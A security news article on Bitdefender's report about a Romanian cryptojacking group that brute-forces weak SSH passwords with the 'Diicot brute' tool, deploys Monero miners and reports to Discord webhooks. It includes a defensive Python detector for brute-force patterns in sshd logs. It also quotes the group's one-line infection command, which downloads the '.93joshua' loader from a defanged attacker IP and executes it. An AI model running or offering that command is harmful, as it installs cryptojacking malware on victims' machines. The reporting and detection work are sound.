A cryptojacking group that is believed to be based in Romania uses a new SSH (Secure Shell Protocol) brute-forcer called “Diicot brute” to crack passwords on Linux-based devices with weak passwords.
Bitdefender researchers said in a report released on Wednesday that the campaign’s focus was mainly to deploy Monero mining malware. However, the gang’s kit allows them to try other types of attacks. The researchers stated that they had linked the group to at least two distributed denial of service (DDoS) botnets: a variant of the Linux-based DDoS DemonBot botnet called “Chernobyl” and a Perl IRC botnet.
Why did the group choose cryptojacking? Because it is a shortcut to the “prey,” as the report explains:
“As you all know, mining for cryptocurrency is slow and tedious, but it can go faster when using multiple systems. Owning multiple systems for mining is not cheap, so attackers try the next best thing: To remotely compromise devices and use them for mining instead.”
Weak credentials on Linux devices
Weak passwords come as no surprise: default usernames and passwords, or weak credentials that attackers can easily crack by brute force, are a significant and unfortunate given in cybersecurity.
The researchers stated in the report that it is not uncommon for attackers to go after weak SSH credentials; the tricky part, however, is not brute-forcing the credentials but rather “doing it in a way that lets attackers go undetected.”
The author of the Diicot brute tool claimed that it could filter out honeypots, the analysts explained. That may be the intent, but “this investigation is proof that it doesn’t, or at least it couldn’t evade ours,” they noted.
Honeypot data from Bitdefender, a Romanian cybersecurity technology company, shows that attacks matching the brute-force tool’s signature started in January. The researchers added, however, that the campaign has not yet used infected systems to spread the malware:
“The IP addresses they originate from belong to a relatively small set, which tells us that the threat actors are not yet using compromised systems to propagate the malware (worm behavior).”
The group was traced in Romania
After analyzing its tools and methods, Bitdefender found that the threat group relies on heavy obfuscation of Bash scripts (Bash is the default login shell for most Linux distributions), compiled with a shell script compiler (shc). The attackers also used Discord to report information back, an increasingly popular move among attackers.
Malicious abuse of collaboration tools such as Slack and Discord to evade security controls and deliver data stealers, remote-access Trojans (RATs), and other malware has increased. For example, in April, Cisco’s Talos cybersecurity team reported on collaboration-app abuse and found 20,000 virus results in a single Discord network search.
By using Discord, attackers accomplish a few things. It relieves them of having to host their own C2 (command-and-control) server, since webhooks (automated messages sent by an app when something happens) are a way to post data to a Discord channel programmatically, the report explained. In addition, Discord presents the collected data in a channel for convenient viewing.
“Discord is increasingly popular among threat actors because of this functionality, as it involuntarily provides support for malware distribution (use of its CDN), C2 (webhooks), or creating communities centered around buying and selling malware source code and services (e.g., DDoS),” says the article.
This information also lets threat actors evaluate how well their tools infect machines, and to scan the list of victims for potential targets of later exploitation.
What triggered the cryptojacking investigation?
The investigation of the group began in May, when analysts discovered a cryptojacking campaign using the “.93joshua” loader. The analysts noted:
“It turns out that the server hosted other files. Although the group hid many of the files, their inclusion in other scripts revealed their presence.”
They also found that the associated domain, mexalz.us, has hosted malware “at least since February.”
Handy cryptojacking tools
Bitdefender concluded that the brute-force cracker is distributed on an as-a-service model, given that it uses a centralized API server; attackers who rent the tool supply their API key in their scripts, according to the report. In fact, this is where the Romania link comes in, the report explains:
“Like most other tools in this kit, the brute-force tool has its interface in a mix of Romanian and English. This leads us to believe that its author is part of the same Romanian group.”
The researchers said that the group has been active since at least 2020.
Attacks in a series
Before they conceal their tracks with techniques such as hiding behind Discord, cryptojackers first need to find weak credentials, which they do by scanning. The researchers stated that the attackers in this case hosted multiple files on the server, including jack.tar.gz, juanito.tar.gz, scn.tar.gz, and skamelot.tar.gz.
The archives contained toolchains for cracking servers with weak SSH credentials, a process that includes the following stages:
- Reconnaissance: identifying SSH servers via port scanning and banner grabbing
- Credential Access: identifying valid credentials via brute-force
- Initial Access: connecting via SSH and executing the infection payload
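The credential-access stage above leaves a recognizable trail in sshd logs. As an added example (not code from the Bitdefender report or the group’s toolkit), the Python below flags sources that fail password authentication repeatedly inside a short window and notes when a password login from the same source follows; the log lines, host name and addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd entries in /var/log/auth.log syslog format.
# Source addresses are documentation-range placeholders, not indicators from the report.
SAMPLE_LOG = """\
Jun 16 10:01:02 host sshd[2311]: Failed password for root from 203.0.113.7 port 40122 ssh2
Jun 16 10:01:03 host sshd[2313]: Failed password for invalid user admin from 203.0.113.7 port 40130 ssh2
Jun 16 10:01:04 host sshd[2315]: Failed password for root from 203.0.113.7 port 40141 ssh2
Jun 16 10:01:05 host sshd[2317]: Failed password for invalid user pi from 203.0.113.7 port 40150 ssh2
Jun 16 10:01:06 host sshd[2319]: Failed password for root from 203.0.113.7 port 40162 ssh2
Jun 16 10:01:07 host sshd[2321]: Accepted password for root from 203.0.113.7 port 40170 ssh2
Jun 16 10:05:00 host sshd[2400]: Failed password for alice from 198.51.100.4 port 51000 ssh2
Jun 16 10:05:30 host sshd[2402]: Accepted publickey for alice from 198.51.100.4 port 51004 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def parse(log, year=2021):
    """Yield (timestamp, ip, user, result, method) for each sshd auth line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"], m["result"], m["method"]

def detect_bruteforce(log, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failed passwords inside a sliding window,
    and record whether a password login from that source followed the failures."""
    hits = {}
    recent = defaultdict(list)  # ip -> [(ts, user)] failures still inside the window
    for ts, ip, user, result, method in parse(log):
        if result == "Failed":
            recent[ip] = [(t, u) for t, u in recent[ip] if (ts - t).total_seconds() <= window_seconds]
            recent[ip].append((ts, user))
            if len(recent[ip]) >= threshold:
                entry = hits.setdefault(ip, {"failures": 0, "users": set(), "login_after_failures": False})
                entry["failures"] = max(entry["failures"], len(recent[ip]))
                entry["users"].update(u for _, u in recent[ip])
        elif method == "password" and ip in hits:
            hits[ip]["login_after_failures"] = True  # the guessing most likely succeeded
    return hits
```

A source that trips the threshold and then logs in with a password is the case worth paging on: it is the “credential access” stage turning into “initial access”.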
The attackers used the tools “ps” and “masscan” for reconnaissance, the analysts explained, while “99x/haiduc” (both Outlaw malware) and “brute” are used for credential access and initial access. Apart from traditional tools such as “masscan” and “zmap,” the threat actors’ toolkit in this instance included the previously unreported SSH brute-forcer, Diicot brute, which is written in Go.
The campaign (still active) includes the use of “skamelot.tar.gz,” which contains the following files:
- r (SHC compiled script) iterates through IP classes and runs Go
- Go (SHC compiled script) runs 99x (haiduc) with the infection payload
- p is a list of attempted credentials
According to the analysts, the payload file is still online, but the attackers have moved it to mexalz.us (from curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua && chmod 777 .93joshua && ./.93joshua && uname -a). The group also uses custom compiled binaries with embedded configurations of the legitimate miner XMRig, an open-source miner that has been adapted for cryptojacking before.
Brute Force is still working
Brute force wouldn’t work if not for weak passwords that give threat actors an easy way to take over devices, noted the researchers: “People are the simple reason why brute-forcing SSH credentials still works.”
Analysts also found the tool, Diicot brute, in the jack.tar.gz and juanito.tar.gz archives. Unlike most of the tools used by Mexalz, it can’t be used on its own; it is meant to be rented out on a SaaS (software as a service) model.
Attackers reusing the tool led to easier tracking
Joseph Carson, chief security scientist and advisory CISO at security firm Thycotic Centrify, said that, relatively speaking, this campaign isn’t all that complicated, despite its use of a new brute-force tool.
“The techniques being used have been shared too often on the darknet, making it easy for anyone with a computer and an internet connection to start a cryptojacking campaign.”
Joseph Carson said that what helps in tracking these groups is that they use their favorite techniques and methods.
“When used often enough, these create a common fingerprint which can be used to track you digitally. The ones that are tough to track are the ones who hide behind stolen code or never reuse the same methods and techniques again.”
For every new campaign, they do something completely different, said Carson, but those attackers are usually “well-funded and resourced.”
“Most cybercriminals will take the easy path and [that] is to reuse as [many] existing tools and techniques as possible. It will really depend on whether the attacker cares about being discovered or not.”
According to Carson, the more steps an attacker takes to stay hidden “tends to mean they operate within a country in which they could be prosecuted if discovered.”